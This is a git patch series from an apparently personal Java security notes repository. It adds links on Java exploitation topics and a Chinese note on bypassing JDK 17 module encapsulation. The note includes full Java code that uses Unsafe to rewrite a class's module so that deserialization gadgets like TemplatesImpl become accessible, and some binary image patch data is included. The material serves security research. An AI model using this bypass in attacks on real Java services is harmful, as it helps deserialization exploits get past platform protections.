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 ff7xAsPtTop+;pU7VkQGWHialZRaYpLHw*k Date: Sat, 17 Dec 2022 17:57:05 +0800 Subject: [PATCH 219/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2e0bfa2..bb3b049 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -215,3 +215,4 @@ + 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* + 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) + 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) ++ 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 From 2c8c93cab4d975230e7fb9c1d809e23496c629cf Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 23:59:21 +0800 Subject: [PATCH 220/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bb3b049..4b3831d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -216,3 +216,4 @@ + 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) + 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) + 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 ++ 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过** From cf526c6b9e18f7f4b286ef8b676665667e455ac6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 18 Dec 2022 13:04:39 +0800 Subject: [PATCH 221/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4b3831d..f3aa154 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -217,3 +217,4 @@ + 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) + 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 + 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过** ++ 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会** From 667d8c3134bfbfec9e8b43ed0adc5921b1a34ec1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 21 Dec 2022 16:12:46 +0800 Subject: [PATCH 222/332] =?UTF-8?q?Create=20jdk17=E7=BB=95=E8=BF=87Module.?= =?UTF-8?q?md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../jdk17\347\273\225\350\277\207Module.md" | 99 +++++++++++++++++++ 1 file changed, 99 insertions(+) create mode 100644 "java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" diff --git "a/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" new file mode 100644 index 0000000..dbd2d4e --- /dev/null +++ "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" @@ -0,0 +1,99 @@ +# jdk17 bypass module + +https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/ + +https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +在jdk17使用反序列化的时候发现要报错 + +``` +InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed +``` + +![image-20221220230825845](img/image-20221220230825845.png) + +限制了 + +![image-20221220233047039](img/image-20221220233047039.png) + +限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + +## 需要bypass + +``` +按照提案的说明,被严格限制的这些内部 API 包括: + +java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。 +sun.* 下的所有类及其成员都是内部 API。 +绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。 +``` + +**code** + +```java + +import sun.misc.Unsafe; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.ArrayList; + +/** + * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + */ +public class BypassModule { + public static void main(String[] args) throws Exception { + final ArrayList classes = new ArrayList<>(); + classes.add(Class.forName("java.lang.reflect.Field")); + classes.add(Class.forName("java.lang.reflect.Method")); + Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); + classes.add(aClass); + new BypassModule().bypassModule(classes); + aClass.newInstance(); + } + + public void bypassModule(ArrayList classes){ + try { + Unsafe unsafe = getUnsafe(); + Class currentClass = this.getClass(); + try { + Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]); + if (getModuleMethod != null) { + for (Class aClass : classes) { + Object targetModule = getModuleMethod.invoke(aClass, new Object[]{}); + unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule); + } + } + }catch (Exception e) { + } + }catch (Exception e){ + e.printStackTrace(); + } + } + + private static Method getMethod(Class clazz,String methodName,Class[] params) { + Method method = null; + while (clazz!=null){ + try { + method = clazz.getDeclaredMethod(methodName,params); + break; + }catch (NoSuchMethodException e){ + clazz = clazz.getSuperclass(); + } + } + return method; + } + + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } +} +``` + From 23663113e7379fcb4a82734418991f114bcccb73 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 21 Dec 2022 16:13:21 +0800 Subject: [PATCH 223/332] Add files via upload --- .../img/image-20221220230825845.png" | Bin 0 -> 88141 bytes .../img/image-20221220233047039.png" | Bin 0 -> 130319 bytes 2 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 "java\346\227\245\345\270\270/img/image-20221220230825845.png" create mode 100644 "java\346\227\245\345\270\270/img/image-20221220233047039.png" diff --git "a/java\346\227\245\345\270\270/img/image-20221220230825845.png" "b/java\346\227\245\345\270\270/img/image-20221220230825845.png" new file mode 100644 index 0000000000000000000000000000000000000000..3d05b8e54a8c9df34ea91fd3311d710efb20620b GIT binary patch literal 88141 zcmag_Wn7eB*T)Tms3?daAV`BqNl8l!64D}_Lw9!#gLI?PIZ89c(4A7!-QC?eFmaFn z^E|KTyq^1WeeM^`i#ZNv@4b$-*Rl5ceOJV1Wm!BNavTf{3_Q6{QeQAI9sw{gu$-Pe zMt}4EDS00T1}%o1l!Urh#^I8ulYVdJ?)^!s#IQ9%IA!<;jE6xf5~}Jy&E~S-^sAp& z`DxYKO*PuAls1+5D%5(mEZd&6md^WJ>3iM?eX_kj?w=n2!Jw9;_&xts7p+C$lQ$R- z-nhKlj85$s^ajx~xeQ}Ie@6=fzfBG?R#5>T18(;A1PkK6)Z5lYQus6qJ;jT2Vk#n# zT&&Y9$a6ZH=fhZE-*Df_fe0QV2MXlu1be>TjF@UAbid6eAeu}G^LALVVD?VGQ4wJC zbnXI59^7tQZ~THVR$Or!GEVr%iX*q*FL8^h_thgj)*DB@GoX0s;dcI4nbSw#V6?vmfLdK2DZ?LU-&7+5f0M{E>Lm(kSA|Z?lse zXih9-fQiL%H|UWvuR6Sd0%%n%M1hIf@erKYwoj$hlVq@&+x3EY zH;$A))JNBvS*$OyvPTC%Se-wk?>~jDuTB*l6qb(kHCkd@Cf=-Ng6DC6=DP1{bhLkCow__9pKyskzvwNpsX8c=ZQ1e^ z@K>KoA8Y{)O}D#dv^p3gwxz7Zh6-fUKEc*`Hl-SOneS7Gz%#3#iHG)TlCbl8I)y1~ zw(GS}3ZpbJg{Zu2KCvZHLk%V4g<{Shd*WMO4{9rJ78de1&GUBa99748kXddX{72^fl74wAztrAOAh)U$0%u4*}Lr#&J=XzsM z!CUWvgyz>QUTb_flJd8gLvdE*j##3-wnq1{JC3`sfmLK#NYb5_2IqJd97>#D?Fu^r zIJY?Z2m&t*El|S`(_&GdyNV&Hww^92rS!_sRZqe_>9}8fxTvL z_$r*Xa}y@p((fdZNC7Xz9OdB4lZqcwpd*KvC`UJ!NPjB(2;IK_2I*#Ps>-XI^d6FecBhr)0Ti=Ic}Himq+8{lX8z2Ub2r z&q)}~>;AUGtFCrie-_Qa!Ihp+?(w#GKHm>BxX>Q3G3I`D8|yZzuGSl%#XV=;`pm1B zXlqGPLzOS6k(9D}N?f9-q%Q(n4bFF-OZ0z9mJE5$UNyP`kk%cE7`@;a&=9uJO z>JO40&#t$1h3;tI34NWdR(!C4zMQH{9TKht*ovS^eOP?NJ2g2v2POFNP1?tU+y=-s zEm7xCm|7rKlL*j*r$h|SD@%Ukw167=gkgot|Dk<74-V+y2z{^~p`_fU;Tkb5Aua1e zbym`Vj5&$xnL?=_$2jUv*v6>X_uBSw{z+ep)fAe);|dGgI4J+3r4v(AniyNFDYTGo zRa%39xjr^^4q!m#?juq3OcR z?L~6M5nl{T(q&BX(^fT_iO;CW_3V}E$i-@@=KC_$B_SXtulofxVbB4yu&PvnnkDd# 